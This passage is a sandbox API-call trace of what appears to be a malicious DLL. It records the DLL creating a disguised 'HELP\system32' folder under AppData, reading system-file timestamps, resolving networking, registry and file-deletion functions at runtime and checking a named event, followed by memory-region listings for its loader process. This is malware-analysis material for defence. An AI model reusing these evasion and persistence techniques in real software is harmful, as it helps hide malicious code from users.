(lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0031.451] GetLastError () returned 0xb7 [0031.451] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0031.451] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0031.451] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0031.451] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0031.451] wsprintfA (in: param_1=0x30f060, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0031.451] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0031.451] wsprintfA (in: param_1=0x30ef5c, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0031.451] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0031.452] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0031.452] CloseHandle (hObject=0x74) returned 1 [0031.452] GetLastError () returned 0x0 [0031.452] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0031.452] GetLastError () returned 0x0 [0031.452] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0031.452] GetSystemDirectoryA (in: lpBuffer=0x30f060, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0031.452] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0031.452] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0031.452] CloseHandle (hObject=0x74) returned 1 [0031.453] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0031.453] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0031.453] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0031.454] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0031.454] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0031.455] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0031.455] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0031.455] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0031.455] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0031.455] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0031.455] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0031.455] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0031.455] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0031.455] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0031.455] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0031.455] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0031.455] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0031.455] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0031.456] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0031.456] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0031.456] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0031.456] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0031.456] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0031.456] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0031.456] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0031.456] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0031.456] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0031.456] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0031.456] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0031.456] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0031.456] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0031.456] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0031.457] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0031.457] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0031.457] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0031.457] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0031.457] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0031.457] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0031.457] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0031.457] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0031.457] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0031.457] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0031.457] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0031.457] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0031.457] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0031.457] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0031.458] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0031.458] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0031.458] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0031.458] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0031.458] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0031.458] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0031.458] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0031.458] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0031.458] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0031.458] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0031.458] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0031.458] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0031.458] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0031.458] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0031.459] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0031.459] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0031.459] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0031.459] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0031.459] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0031.459] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0031.459] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0031.459] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0031.459] AddAtomS () returned 0x0 [0031.461] HeapDestroy (hHeap=0x860000) returned 1 Process: id = "11" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4f7c0" os_pid = "0xad4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=AddAtomT /fn_args=\"0\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 607 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 608 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 609 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 610 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 611 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 612 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 613 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 614 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 615 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 616 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 617 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 618 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 619 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 620 start_va = 0x570000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 621 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 622 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 623 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 624 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 625 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 626 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 627 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 628 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 629 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 630 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 631 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 632 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 633 start_va = 0x210000 end_va = 0x2d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 634 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 635 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 636 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 637 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 638 start_va = 0x3f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 639 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 640 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 641 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 642 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 643 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 644 start_va = 0x1200000 end_va = 0x129ffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 645 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 646 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 647 start_va = 0x12a0000 end_va = 0x135ffff entry_point = 0x0 region_type = private name = "private_0x00000000012a0000" filename = "" Thread: id = 28 os_tid = 0xad8 [0031.503] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20f3ec | out: lpSystemTimeAsFileTime=0x20f3ec*(dwLowDateTime=0xe0800610, dwHighDateTime=0x1d3dfba)) [0031.503] GetCurrentProcessId () returned 0xad4 [0031.503] GetCurrentThreadId () returned 0xad8 [0031.503] GetTickCount () returned 0x1709d [0031.503] QueryPerformanceCounter (in: lpPerformanceCount=0x20f3e4 | out: lpPerformanceCount=0x20f3e4*=360529144) returned 1 [0031.504] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.504] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0031.505] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0031.505] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0031.505] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0031.505] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.505] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.505] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.505] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.506] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.506] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.506] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.506] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.506] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.506] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.506] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.506] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.507] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.507] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.507] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.507] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0031.508] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.508] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0031.508] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.508] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.508] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0031.508] GetCurrentThreadId () returned 0xad8 [0031.508] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=AddAtomT /fn_args=\"0\"" [0031.508] GetEnvironmentStringsW () returned 0x3078b8* [0031.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0031.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x12909f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0031.509] FreeEnvironmentStringsW (penv=0x3078b8) returned 1 [0031.509] GetStartupInfoA (in: lpStartupInfo=0x20f33c | out: lpStartupInfo=0x20f33c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0031.509] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0031.509] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0031.509] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0031.509] SetHandleCount (uNumber=0x20) returned 0x20 [0031.509] GetLastError () returned 0x0 [0031.509] SetLastError (dwErrCode=0x0) [0031.509] GetLastError () returned 0x0 [0031.510] SetLastError (dwErrCode=0x0) [0031.510] GetLastError () returned 0x0 [0031.510] SetLastError (dwErrCode=0x0) [0031.510] GetACP () returned 0x4e4 [0031.510] GetLastError () returned 0x0 [0031.510] SetLastError (dwErrCode=0x0) [0031.510] IsValidCodePage (CodePage=0x4e4) returned 1 [0031.510] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x20f31c | out: lpCPInfo=0x20f31c) returned 1 [0031.510] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x20ede8 | out: lpCPInfo=0x20ede8) returned 1 [0031.510] GetLastError () returned 0x0 [0031.510] SetLastError (dwErrCode=0x0) [0031.510] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x20ed78 | out: lpCharType=0x20ed78) returned 1 [0031.510] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x20f1fc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0031.510] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x20f1fc, cbMultiByte=256, lpWideCharStr=0x20eb68, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā") returned 256 [0031.510] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā", cchSrc=256, lpCharType=0x20edfc | out: lpCharType=0x20edfc) returned 1 [0031.510] GetLastError () returned 0x0 [0031.510] SetLastError (dwErrCode=0x0) [0031.510] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0031.510] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x20f1fc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0031.510] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x20f1fc, cbMultiByte=256, lpWideCharStr=0x20eb38, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0031.510] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ 